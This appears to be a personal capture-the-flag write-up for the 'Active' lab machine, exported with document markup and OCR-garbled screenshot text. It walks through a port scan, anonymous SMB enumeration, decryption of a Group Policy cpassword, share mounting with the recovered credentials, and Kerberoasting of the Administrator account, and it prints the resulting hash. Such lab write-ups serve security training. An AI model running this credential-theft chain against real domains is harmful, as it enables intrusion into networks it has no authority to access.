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EF54C2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Active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09 September 2023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18:57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Paths: Crest CRT, Intro to Zephyr, AD 101 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10.10.10.100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906000" cy="6581775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="Machine generated alternative text:&#10;(kali@ kali)-C &#10;—'Documents 'Active &#10;$ nmap -T4 -A -p- &#10;-OA Active &#10;10.10. 10.100 &#10;Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 18:59 SST &#10;Nmap scan report for lø.lø.lø.løø &#10;Host is up (ø.ø33s latency) &#10;Not shown: 65513 closed tcp ports (conn-refused) &#10;PORT &#10;53/tcp &#10;STATE SERVICE &#10;open domain &#10;VERSION &#10;Microsoft DNS 6.1. 7601 (10815039) (Windows server 2008 R2 SPI) &#10;I dns-nsid: &#10;bind. version: Microsoft DNS 6.1.7601 (IDB15D39) &#10;Default-First-Site-Name) &#10;Default-First-Site-Name) &#10;88/tcp &#10;135/tcp &#10;139/tcp &#10;389/tcp &#10;445/tcp &#10;464/tcp &#10;593/tcp &#10;636/tcp &#10;3268/tcp &#10;3269/tcp &#10;5722/tcp &#10;9389/tcp &#10;49152/tcp &#10;49153/tcp &#10;49154/tcp &#10;49155/tcp &#10;49157/tcp &#10;49158/tcp &#10;49165/tcp &#10;49168/tcp &#10;49174/tcp &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-09 18:øø:17Z) &#10;msrpc &#10;netbios-ssn &#10;I dap &#10;microsoft-ds? &#10;kpasswd5? &#10;ncacn http &#10;tcpwrapped &#10;I dap &#10;tcpwrapped &#10;msrpc &#10;mc-nmf &#10;Microsoft Windows RPC &#10;Microsoft Windows netbios-ssn &#10;Microsoft Windows Active Directory L DAP (Domain. &#10;Microsoft Windows RPC over HTTP l.ø &#10;Microsoft Windows Active Directory L DAP (Domain. &#10;Microsoft Windows RPC &#10;NET Message Framing &#10;active.htb, &#10;active.htb, &#10;Site. &#10;Site: &#10;msrpc &#10;msrpc &#10;msrpc &#10;msrpc &#10;ncacn &#10;msrpc &#10;msrpc &#10;msrpc &#10;msrpc &#10;http &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;RPC &#10;RPC &#10;RPC &#10;RPC &#10;RPC over HTTP l.ø &#10;RPC &#10;RPC &#10;RPC &#10;RPC &#10;OS : &#10;Service Info: Host: DC; &#10;Host script results. &#10;I smb2-time : &#10;date: &#10;start date: 2023-09- &#10;I smb2-security-mode: &#10;2:1:ø: &#10;Windows; CPE: cpe:/o:microsoft:windows server 2øø8:r2:sp1, &#10;cpe : / o :microsoft : windows &#10;Message signing enabled and required &#10;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ &#10;Nmap done: 1 IP address (1 host up) scanned in 1øø.8ø secon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(kali@ kali)-C &#10;—'Documents 'Active &#10;$ nmap -T4 -A -p- &#10;-OA Active &#10;10.10. 10.100 &#10;Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 18:59 SST &#10;Nmap scan report for lø.lø.lø.løø &#10;Host is up (ø.ø33s latency) &#10;Not shown: 65513 closed tcp ports (conn-refused) &#10;PORT &#10;53/tcp &#10;STATE SERVICE &#10;open domain &#10;VERSION &#10;Microsoft DNS 6.1. 7601 (10815039) (Windows server 2008 R2 SPI) &#10;I dns-nsid: &#10;bind. version: Microsoft DNS 6.1.7601 (IDB15D39) &#10;Default-First-Site-Name) &#10;Default-First-Site-Name) &#10;88/tcp &#10;135/tcp &#10;139/tcp &#10;389/tcp &#10;445/tcp &#10;464/tcp &#10;593/tcp &#10;636/tcp &#10;3268/tcp &#10;3269/tcp &#10;5722/tcp &#10;9389/tcp &#10;49152/tcp &#10;49153/tcp &#10;49154/tcp &#10;49155/tcp &#10;49157/tcp &#10;49158/tcp &#10;49165/tcp &#10;49168/tcp &#10;49174/tcp &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;open &#10;kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-09 18:øø:17Z) &#10;msrpc &#10;netbios-ssn &#10;I dap &#10;microsoft-ds? &#10;kpasswd5? &#10;ncacn http &#10;tcpwrapped &#10;I dap &#10;tcpwrapped &#10;msrpc &#10;mc-nmf &#10;Microsoft Windows RPC &#10;Microsoft Windows netbios-ssn &#10;Microsoft Windows Active Directory L DAP (Domain. &#10;Microsoft Windows RPC over HTTP l.ø &#10;Microsoft Windows Active Directory L DAP (Domain. &#10;Microsoft Windows RPC &#10;NET Message Framing &#10;active.htb, &#10;active.htb, &#10;Site. &#10;Site: &#10;msrpc &#10;msrpc &#10;msrpc &#10;msrpc &#10;ncacn &#10;msrpc &#10;msrpc &#10;msrpc &#10;msrpc &#10;http &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Microsoft &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;Windows &#10;RPC &#10;RPC &#10;RPC &#10;RPC &#10;RPC over HTTP l.ø &#10;RPC &#10;RPC &#10;RPC &#10;RPC &#10;OS : &#10;Service Info: Host: DC; &#10;Host script results. &#10;I smb2-time : &#10;date: &#10;start date: 2023-09- &#10;I smb2-security-mode: &#10;2:1:ø: &#10;Windows; CPE: cpe:/o:microsoft:windows server 2øø8:r2:sp1, &#10;cpe : / o :microsoft : windows &#10;Message signing enabled and required &#10;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ &#10;Nmap done: 1 IP address (1 host up) scanned in 1øø.8ø seconds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734175" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="Machine generated alternative text:&#10;kali &#10;—'Document s 'Active &#10;L$ smbcLient -L X X X Xlø.lø.lø.løøxx &#10;Password for (WORKGROUP Nkali) &#10;Anonymous login successful &#10;Comment &#10;Remote Admin &#10;Default share &#10;Remote IPC &#10;Logon server share &#10;Logon server share &#10;Sharename &#10;ADMIN$ &#10;c$ &#10;IPC$ &#10;NETLOGON &#10;Replication &#10;SYSVOL &#10;Users &#10;Reconnecting with SMBI &#10;do connect: Connection &#10;Unable to connect with &#10;Type &#10;Disk &#10;Disk &#10;IPC &#10;Disk &#10;Disk &#10;Disk &#10;Disk &#10;for workgroup listing. &#10;to 10.10. 10.100 failed (Error NT_STATUS RESOURCE NAME NOT_FOUND) &#10;no workgroup available &#10;SMB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kali &#10;—'Document s 'Active &#10;L$ smbcLient -L X X X Xlø.lø.lø.løøxx &#10;Password for (WORKGROUP Nkali) &#10;Anonymous login successful &#10;Comment &#10;Remote Admin &#10;Default share &#10;Remote IPC &#10;Logon server share &#10;Logon server share &#10;Sharename &#10;ADMIN$ &#10;c$ &#10;IPC$ &#10;NETLOGON &#10;Replication &#10;SYSVOL &#10;Users &#10;Reconnecting with SMBI &#10;do connect: Connection &#10;Unable to connect with &#10;Type &#10;Disk &#10;Disk &#10;IPC &#10;Disk &#10;Disk &#10;Disk &#10;Disk &#10;for workgroup listing. &#10;to 10.10. 10.100 failed (Error NT_STATUS RESOURCE NAME NOT_FOUND) &#10;no workgroup available &#10;SMBI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76650" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="Machine generated alternative text:&#10;kali)-C &#10;—'Documents 'Active &#10;smbclient &#10;.10.10 .1øøXXRep1ication &#10;Password for CWORKGROUPXkaLi) &#10;Anonymous Login successful &#10;Try &quot;help&quot; to get a list of possible commands. &#10;smb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kali)-C &#10;—'Documents 'Active &#10;smbclient &#10;.10.10 .1øøXXRep1ication &#10;Password for CWORKGROUPXkaLi) &#10;Anonymous Login successful &#10;Try &quot;help&quot; to get a list of possible commands. &#10;smb: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 are loads of folders and files so rather than manually go through and download them individually, we can do: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487275" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4" name="Picture 4" descr="Machine generated alternative text:&#10;smb: recurse ON &#10;smb: prompt OFF &#10;smb: mget * &#10;getting file Nactive.htbXp01iciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hGPT.1N1 of size 23 as active.htb/p01icies/01B2F34ø-ø16D-11D2-945F-øøcø4FB984F9/GPT.1N1 ( &#10;0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) &#10;getting file Nactive.htbXp01iciesM6AC1786c-ø16F-11D2-945F-øøcø4fB984F9hGPT.1N1 of size 22 as active.htb/p01icies/16AC1786c-ø16F-11D2-945F-øøcø4fB984F9/GPT.1N1 ( &#10;0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) &#10;getting file Nactive.htbXp01iciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hGroup policyXGPE.1N1 of size 119 as active.htb/p01icies/01B2F34ø-ø16D-11D2-945F-øøcø4FB98 &#10;4F9VGroup policy/GPE.INI (1.2 KiloBytes/sec) (average 0.5 &#10;Ki LoBytes/sec) &#10;getting file Nactive.htbXpoLiciesM31B2F34ø-ø16D-11D2-945F- &#10;øøcø4FB984F9hMACHINEXRegistry.p01 of size 2788 as active.htb/p01icies/01B2F34ø-ø16D-11D2-945F-øøcø4FB9 &#10;84F9VMACHINE/Registry . pol (13.6 KiloBytes/sec) (average 5 &#10;7 KiloBytes/sec) &#10;getting file Nactive.htbXpoliciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hMACHINEXpreferencesXGroupsXGroups.xm1 of size 533 as active.htb/p01icies/131B2F34ø-ø16D-11 &#10;D2-945F-øøcø4FB984F9VMACHINE/preferences/Groups/Groups.xml (3.7 KiloBytes/sec) (average 5.2 KiloBytes/sec) &#10;getting file Nactive.htbXpoLiciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hMACHINEXMicrosoftXWindows NTXSecEditXGptTmp1.inf of size 1098 as active.htb/p01icies/01B2 &#10;F34ø-ø16D-11D2-945F-øøcø4FB984F9/MACHINE/Microsoft/Windows NT/secEdit/GptTmp1.inf (13.6 KiloBytes/sec) (average 6.1 KiloBytes/sec) &#10;getting file Nactive.htbXpoLiciesM6AC1786C-ø16F-11D2-945F-øøcø4fB984F9hMACHINEXMicrosoftXWindows NTNSecEditXGptTmpl.inf of size 3722 as active.htb/p01iciesA6AC1 &#10;786C-ø16F-11D2-945F-øøcø4fB984F9/MACHINE/Microsoft/Windows NT/secEdit/GptTmp1.inf (45.4 KiloBytes/sec) (average 10.0 KiloBytes/sec) &#10;smb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mb: recurse ON &#10;smb: prompt OFF &#10;smb: mget * &#10;getting file Nactive.htbXp01iciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hGPT.1N1 of size 23 as active.htb/p01icies/01B2F34ø-ø16D-11D2-945F-øøcø4FB984F9/GPT.1N1 ( &#10;0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) &#10;getting file Nactive.htbXp01iciesM6AC1786c-ø16F-11D2-945F-øøcø4fB984F9hGPT.1N1 of size 22 as active.htb/p01icies/16AC1786c-ø16F-11D2-945F-øøcø4fB984F9/GPT.1N1 ( &#10;0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) &#10;getting file Nactive.htbXp01iciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hGroup policyXGPE.1N1 of size 119 as active.htb/p01icies/01B2F34ø-ø16D-11D2-945F-øøcø4FB98 &#10;4F9VGroup policy/GPE.INI (1.2 KiloBytes/sec) (average 0.5 &#10;Ki LoBytes/sec) &#10;getting file Nactive.htbXpoLiciesM31B2F34ø-ø16D-11D2-945F- &#10;øøcø4FB984F9hMACHINEXRegistry.p01 of size 2788 as active.htb/p01icies/01B2F34ø-ø16D-11D2-945F-øøcø4FB9 &#10;84F9VMACHINE/Registry . pol (13.6 KiloBytes/sec) (average 5 &#10;7 KiloBytes/sec) &#10;getting file Nactive.htbXpoliciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hMACHINEXpreferencesXGroupsXGroups.xm1 of size 533 as active.htb/p01icies/131B2F34ø-ø16D-11 &#10;D2-945F-øøcø4FB984F9VMACHINE/preferences/Groups/Groups.xml (3.7 KiloBytes/sec) (average 5.2 KiloBytes/sec) &#10;getting file Nactive.htbXpoLiciesM31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9hMACHINEXMicrosoftXWindows NTXSecEditXGptTmp1.inf of size 1098 as active.htb/p01icies/01B2 &#10;F34ø-ø16D-11D2-945F-øøcø4FB984F9/MACHINE/Microsoft/Windows NT/secEdit/GptTmp1.inf (13.6 KiloBytes/sec) (average 6.1 KiloBytes/sec) &#10;getting file Nactive.htbXpoLiciesM6AC1786C-ø16F-11D2-945F-øøcø4fB984F9hMACHINEXMicrosoftXWindows NTNSecEditXGptTmpl.inf of size 3722 as active.htb/p01iciesA6AC1 &#10;786C-ø16F-11D2-945F-øøcø4fB984F9/MACHINE/Microsoft/Windows NT/secEdit/GptTmp1.inf (45.4 KiloBytes/sec) (average 10.0 KiloBytes/sec) &#10;smb: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7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 notice a groups.xml which could contain some useful items. Let's have a closer look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468225" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="Machine generated alternative text:&#10;kali)-C &#10;-/m/(31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9VMACHINE/Preferences/Groups &#10;Groups. xml &#10;c?xml &#10;uid-&quot;IEF57DA28-5F69-453ø-A59E-AAB58578219DFXProperties &#10;KOhJ0dcqh4ZGMexosQbcpZ3xUjTLfcuNH8pG5aSVYdYw/Ng1VmQ&quot; changeLogon-&quot;ø&quot; &#10;Q Group&quot; &#10;action:&quot; &#10;clsid-&quot;0125E937-EB16-4b4c-9934-544FC6D24D26FXlJser clsid-&quot;IDF5F1855-51E5-4d24-8BIA-D9BDE98BAIDIF TGS&quot; image:&quot; 2&quot; changed:&quot; 2018-07-18 &#10;cpassword- t/QS9Fe1cJ83mjWA98gw9gu &#10;newName-&quot; &#10;full Name:&quot;&quot; &#10;description:&quot;&quot; &#10;noChange-&quot;1&quot; neverExpires-&quot;1&quot; acctDisabled-&quot;ø&quot; userName-&quot;active.htbÅSVC TGS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kali)-C &#10;-/m/(31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9VMACHINE/Preferences/Groups &#10;Groups. xml &#10;c?xml &#10;uid-&quot;IEF57DA28-5F69-453ø-A59E-AAB58578219DFXProperties &#10;KOhJ0dcqh4ZGMexosQbcpZ3xUjTLfcuNH8pG5aSVYdYw/Ng1VmQ&quot; changeLogon-&quot;ø&quot; &#10;Q Group&quot; &#10;action:&quot; &#10;clsid-&quot;0125E937-EB16-4b4c-9934-544FC6D24D26FXlJser clsid-&quot;IDF5F1855-51E5-4d24-8BIA-D9BDE98BAIDIF TGS&quot; image:&quot; 2&quot; changed:&quot; 2018-07-18 &#10;cpassword- t/QS9Fe1cJ83mjWA98gw9gu &#10;newName-&quot; &#10;full Name:&quot;&quot; &#10;description:&quot;&quot; &#10;noChange-&quot;1&quot; neverExpires-&quot;1&quot; acctDisabled-&quot;ø&quot; userName-&quot;active.htbÅSVC TGS&quo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 is a cpassword stored in the file! Thi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s can be decrypted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858125" cy="495300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="Machine generated alternative text:&#10;(kali@ kali)-C &#10;-/m/(31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9VMACHINE/Preferences/Groups &#10;$ gpp-decrypt &#10;edBSHowhZLTjt/QS9Fe1cJ83mjWA98gw9guK0hJ0dcqh4ZGMexosQbcpZ3xUjTLfcuNH8pG5aSVYdYw/Ng1VmQ &#10;GPPstillStandingStrong2k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(kali@ kali)-C &#10;-/m/(31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9VMACHINE/Preferences/Groups &#10;$ gpp-decrypt &#10;edBSHowhZLTjt/QS9Fe1cJ83mjWA98gw9guK0hJ0dcqh4ZGMexosQbcpZ3xUjTLfcuNH8pG5aSVYdYw/Ng1VmQ &#10;GPPstillStandingStrong2k18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we have a password but we need to work out what users are on the machine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439650" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7" name="Picture 7" descr="Machine generated alternative text:&#10;kali &#10;-/m/(31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9VMACHINE/Preferences/Groups &#10;•$ GetADUsers.py active.htb/svc TGS:GPPstillStandingStrong2k18 &#10;-dc-ip &#10;-all &#10;10.10. 10.100 &#10;/usr/share/offsec-awae-whee1s/pyOpenSSL-19.1. ø-py2 . py3-none-any . wh1/OpenSSL/crypto . py : 12 : &#10;thon core team. Support for it is now deprecated in cryptography, and will be removed &#10;Impacket vø.9.19 &#10;Copyright 2019 SecureAuth Corporation &#10;) Querying lø.lø.lø.løø for information about domain. &#10;19:50. &#10;CryptographyDeprecationWarning: &#10;the next release. &#10;Python 2 is no longer supported by the Py &#10;• 40 &#10;LastLogon &#10;2023-09-09 &#10;cneve» &#10;cneve» &#10;2018-07-21 &#10;18:59:23 &#10;Name &#10;Administrator &#10;Guest &#10;krbtgt &#10;SVC TGS &#10;Emai L &#10;PasswordLastSet &#10;2018-07-18 &#10;cneve» &#10;2018-07-18 &#10;2018-07-18 &#10;20. &#10;21:14:3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kali &#10;-/m/(31B2F34ø-ø16D-11D2-945F-øøcø4FB984F9VMACHINE/Preferences/Groups &#10;•$ GetADUsers.py active.htb/svc TGS:GPPstillStandingStrong2k18 &#10;-dc-ip &#10;-all &#10;10.10. 10.100 &#10;/usr/share/offsec-awae-whee1s/pyOpenSSL-19.1. ø-py2 . py3-none-any . wh1/OpenSSL/crypto . py : 12 : &#10;thon core team. Support for it is now deprecated in cryptography, and will be removed &#10;Impacket vø.9.19 &#10;Copyright 2019 SecureAuth Corporation &#10;) Querying lø.lø.lø.løø for information about domain. &#10;19:50. &#10;CryptographyDeprecationWarning: &#10;the next release. &#10;Python 2 is no longer supported by the Py &#10;• 40 &#10;LastLogon &#10;2023-09-09 &#10;cneve» &#10;cneve» &#10;2018-07-21 &#10;18:59:23 &#10;Name &#10;Administrator &#10;Guest &#10;krbtgt &#10;SVC TGS &#10;Emai L &#10;PasswordLastSet &#10;2018-07-18 &#10;cneve» &#10;2018-07-18 &#10;2018-07-18 &#10;20. &#10;21:14:38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we have some usernames, lets go back to trying the previous SMB shares as the SVC_TGS account as that is none standard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Had some oddness </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>with smbmap so had to mount the folder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81875" cy="2790825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="8" name="Picture 8" descr="Machine generated alternative text:&#10;kali)-C &#10;—'Documents 'Active &#10;GPPsti11StandingStrong2k18 &#10;N/. &#10;10.10. 10.100 &#10;smbmap -d &#10;active.htb &#10;N/. &#10;SVC TGS &#10;(l &#10;ShawnDEvansagmail . com &#10;Samba Share Enumerator I Shawn Evans &#10;SMBMap &#10;https : //github . com/ShawnDEvans/smbmap &#10;'priv status' &#10;where it is not associated with a value &#10;Detected 1 hosts serving SMS &#10;Established 1 SMS session(s) &#10;cannot access local variable &#10;Bummer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kali)-C &#10;—'Documents 'Active &#10;GPPsti11StandingStrong2k18 &#10;N/. &#10;10.10. 10.100 &#10;smbmap -d &#10;active.htb &#10;N/. &#10;SVC TGS &#10;(l &#10;ShawnDEvansagmail . com &#10;Samba Share Enumerator I Shawn Evans &#10;SMBMap &#10;https : //github . com/ShawnDEvans/smbmap &#10;'priv status' &#10;where it is not associated with a value &#10;Detected 1 hosts serving SMS &#10;Established 1 SMS session(s) &#10;cannot access local variable &#10;Bummer :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790825" cy="361950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="C:\507956E5\D3CF0293-356D-4D78-8B70-1C4BFBCFF146_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507956E5\D3CF0293-356D-4D78-8B70-1C4BFBCFF146_files\image0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839325" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10" name="Picture 10" descr="Machine generated alternative text:&#10;H kali@ kali C—/Documents/Active &#10;L-$ sudo mount &#10;cifs // 10.10.1ø.1øø/Users &#10;/mnt/Users &#10;-o username-SVC TGS , password-GPPsti11StandingStrong2k18, domain-active.ht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H kali@ kali C—/Documents/Active &#10;L-$ sudo mount &#10;cifs // 10.10.1ø.1øø/Users &#10;/mnt/Users &#10;-o username-SVC TGS , password-GPPsti11StandingStrong2k18, domain-active.htb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153650" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11" name="Picture 11" descr="Machine generated alternative text:&#10;(kali'S &#10;—/Documents/Active &#10;$ cd &#10;/mnt/Users &#10;( kali@ kali C/mnt/Users &#10;' Default User' &#10;desktop. ini &#10;'My Documents' &#10;public &#10;'My Music' &#10;SVC_TGS &#10;'My Pictures' &#10;Administrator &#10;kali@ kali C/mnt/Users &#10;SVC_TGS &#10;Default &#10;( kali@ kali )- /mnt/Users/SVC_ &#10;Desktop Downloads &#10;Contacts &#10;(kali@ kali C/mnt/Users/SVC_ &#10;$ cd &#10;Desktop &#10;( kali@ kali )- /mnt/Users/SVC_ &#10;user. txt &#10;TGS &#10;Favorites &#10;TGS &#10;TGS/Desktop &#10;Links &#10;'My Videos' &#10;' Saved Games ' &#10;Search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(kali'S &#10;—/Documents/Active &#10;$ cd &#10;/mnt/Users &#10;( kali@ kali C/mnt/Users &#10;' Default User' &#10;desktop. ini &#10;'My Documents' &#10;public &#10;'My Music' &#10;SVC_TGS &#10;'My Pictures' &#10;Administrator &#10;kali@ kali C/mnt/Users &#10;SVC_TGS &#10;Default &#10;( kali@ kali )- /mnt/Users/SVC_ &#10;Desktop Downloads &#10;Contacts &#10;(kali@ kali C/mnt/Users/SVC_ &#10;$ cd &#10;Desktop &#10;( kali@ kali )- /mnt/Users/SVC_ &#10;user. txt &#10;TGS &#10;Favorites &#10;TGS &#10;TGS/Desktop &#10;Links &#10;'My Videos' &#10;' Saved Games ' &#10;Searche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 flag obtained and now we will see if there are users that are Kerberoastable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Screen clipping taken: 09/09/2023 20:45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496800" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12" name="Picture 12" descr="Machine generated alternative text:&#10;(kali@ kali)-C &#10;—'Documents 'Active &#10;$ impacket-GetUserSPNs &#10;active . htb/svc_tgs :GPPsti11StandingStrong2k18 &#10;-dc-ip &#10;10.10. 10.100 &#10;Impacket vø.ll.ø &#10;Copyright 2023 Fortra &#10;-request &#10;PasswordLastSet &#10;LastLogon &#10;2023-09-09 18:59: 23.663746 &#10;Delegation &#10;ServicePrincipa1Name Name &#10;MemberOf &#10;active/CIFS:445 &#10;Administrator &#10;2018-07-18 &#10;CN-Group Policy Creator Owners, Dc-active, DC-htb &#10;CCache file is not found. Skipping. . &#10;$krb5tgs$23$*Administrator$ACTIVE . HTB$active . htb/Administrator*$d59a317c5bøeb15a91dfcd7ø9b33fe71$37e6ø3ab659fd5648132c76ø3fc77b9232d4øf4fca99f2aa1e9d8d35dd7Ø49aecø &#10;f65f455daøø7fb692føbb5dd6cb5218116edc11342349f7363352b52d3f492cc45baa65a9c35bd522f5632b44e2Ø494afec8ceø66b1d52787177a696fb8øa7a4ae6cøff377b439a5972314f74519a4c6f45 &#10;919076ca8be3bd4127b1b789e94127Ø5546Ø1d72f34755fabf462dd7f5d97f9a1Ø6c8773c169b577øø2adcaø92d3726d3Ø9899øb164dø78ødfad795a4dc73d7c492cfa2318f1166e96e3f48c8bbb4daefc8 &#10;09fd72bf266663c4d1døaf841b44b531be8fa22cabacøde8f786943b5fcbf3257c51bb752d495a6fe5ca74a9c788f5bb36øc559a5eØ565fc9716Ø84d2378Ø5ba137bd2926b875øeff971499e1f9df6ød1bd &#10;7dØ1f8øf9a286ad88abad82b86ff19e45e55a2c5bd3e2a58f6b9a92f5Ø22Ø97b89ddc366ø6e5a9fc14dccfe125cc1f6726ed53c311dcø5a7øaa5aaf55f8522989ebac4cce67373979ffac54343f3684c2aø &#10;5afc3ø7117Ø483fae32d81395ø9efff7d4b3163e4b58eøbbfad848ø4caøcadc6f82815333aø64b2d5Ø6aa56248683d61859d3e25cc8d9c38baØ9221193dfd47297766ba8f93fd16c39d2c43e392ØØ9Ø712c &#10;If66388bc25Ø6abfecb3f4446cbc44ø9c455ø46bbf86b2242859cba692Øa4b7cf4e2c422fe2ca3c29898b3b7c5fd6d9Ø12e12b52993aøø66c5fbcb8457ad13aba7øcac47f6Ø5aø7Øbf94aøø7e86baøø4fd2 &#10;d9c8Ø61c97fce84a25de454963f9c9239675e13c53eda8caaace676baø2cfbb1e9efd4bd51b683417a139888afa8283øc763ec84521cf1a74c2aØ8d919932a431d1e7e15e989e42c9f67e218cbd2b242256 &#10;ceaad5b36d97b1a3øeceefb3e11277e3e6f8742d7efØ62fØ7e854Ø8Ø64e7cdcdfdbec5f5da9adøe5d4ba1cdbaød11fbøab2aebafced11Øb3øa33fde8575b3ab5f9df44øcbd6665aacaaf2292a28c8ac73b5 &#10;9ee9326da9eødø6e1dc7c9c7ce9189625øf5aø72øe9c723897døe74928afe6ee385e3c5386f77øøae8cø8e4ec11181bøøøfeøac91c7f21accab6cf592e1ba78bbed1ae3986b93d5f1993731e9cae73f3dc7 &#10;6453ab6ea3f22f69ad1e538d35963b754ed3f362ø5ae8b8e5bødaføøc33b8418cc3b22død9c4f82øf4de794øcac272cøadd4da35c914bf6øcd5ef835573cfa67489c9885ee98ø362a7ø38a83fdø7df6bf16 &#10;774038a8d1ø54c854863ø561c85d163d3ff23359eøcc79ca5cff766e1cøbe1574d1b2f4532ae74eb5øø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(kali@ kali)-C &#10;—'Documents 'Active &#10;$ impacket-GetUserSPNs &#10;active . htb/svc_tgs :GPPsti11StandingStrong2k18 &#10;-dc-ip &#10;10.10. 10.100 &#10;Impacket vø.ll.ø &#10;Copyright 2023 Fortra &#10;-request &#10;PasswordLastSet &#10;LastLogon &#10;2023-09-09 18:59: 23.663746 &#10;Delegation &#10;ServicePrincipa1Name Name &#10;MemberOf &#10;active/CIFS:445 &#10;Administrator &#10;2018-07-18 &#10;CN-Group Policy Creator Owners, Dc-active, DC-htb &#10;CCache file is not found. Skipping. . &#10;$krb5tgs$23$*Administrator$ACTIVE . HTB$active . htb/Administrator*$d59a317c5bøeb15a91dfcd7ø9b33fe71$37e6ø3ab659fd5648132c76ø3fc77b9232d4øf4fca99f2aa1e9d8d35dd7Ø49aecø &#10;f65f455daøø7fb692føbb5dd6cb5218116edc11342349f7363352b52d3f492cc45baa65a9c35bd522f5632b44e2Ø494afec8ceø66b1d52787177a696fb8øa7a4ae6cøff377b439a5972314f74519a4c6f45 &#10;919076ca8be3bd4127b1b789e94127Ø5546Ø1d72f34755fabf462dd7f5d97f9a1Ø6c8773c169b577øø2adcaø92d3726d3Ø9899øb164dø78ødfad795a4dc73d7c492cfa2318f1166e96e3f48c8bbb4daefc8 &#10;09fd72bf266663c4d1døaf841b44b531be8fa22cabacøde8f786943b5fcbf3257c51bb752d495a6fe5ca74a9c788f5bb36øc559a5eØ565fc9716Ø84d2378Ø5ba137bd2926b875øeff971499e1f9df6ød1bd &#10;7dØ1f8øf9a286ad88abad82b86ff19e45e55a2c5bd3e2a58f6b9a92f5Ø22Ø97b89ddc366ø6e5a9fc14dccfe125cc1f6726ed53c311dcø5a7øaa5aaf55f8522989ebac4cce67373979ffac54343f3684c2aø &#10;5afc3ø7117Ø483fae32d81395ø9efff7d4b3163e4b58eøbbfad848ø4caøcadc6f82815333aø64b2d5Ø6aa56248683d61859d3e25cc8d9c38baØ9221193dfd47297766ba8f93fd16c39d2c43e392ØØ9Ø712c &#10;If66388bc25Ø6abfecb3f4446cbc44ø9c455ø46bbf86b2242859cba692Øa4b7cf4e2c422fe2ca3c29898b3b7c5fd6d9Ø12e12b52993aøø66c5fbcb8457ad13aba7øcac47f6Ø5aø7Øbf94aøø7e86baøø4fd2 &#10;d9c8Ø61c97fce84a25de454963f9c9239675e13c53eda8caaace676baø2cfbb1e9efd4bd51b683417a139888afa8283øc763ec84521cf1a74c2aØ8d919932a431d1e7e15e989e42c9f67e218cbd2b242256 &#10;ceaad5b36d97b1a3øeceefb3e11277e3e6f8742d7efØ62fØ7e854Ø8Ø64e7cdcdfdbec5f5da9adøe5d4ba1cdbaød11fbøab2aebafced11Øb3øa33fde8575b3ab5f9df44øcbd6665aacaaf2292a28c8ac73b5 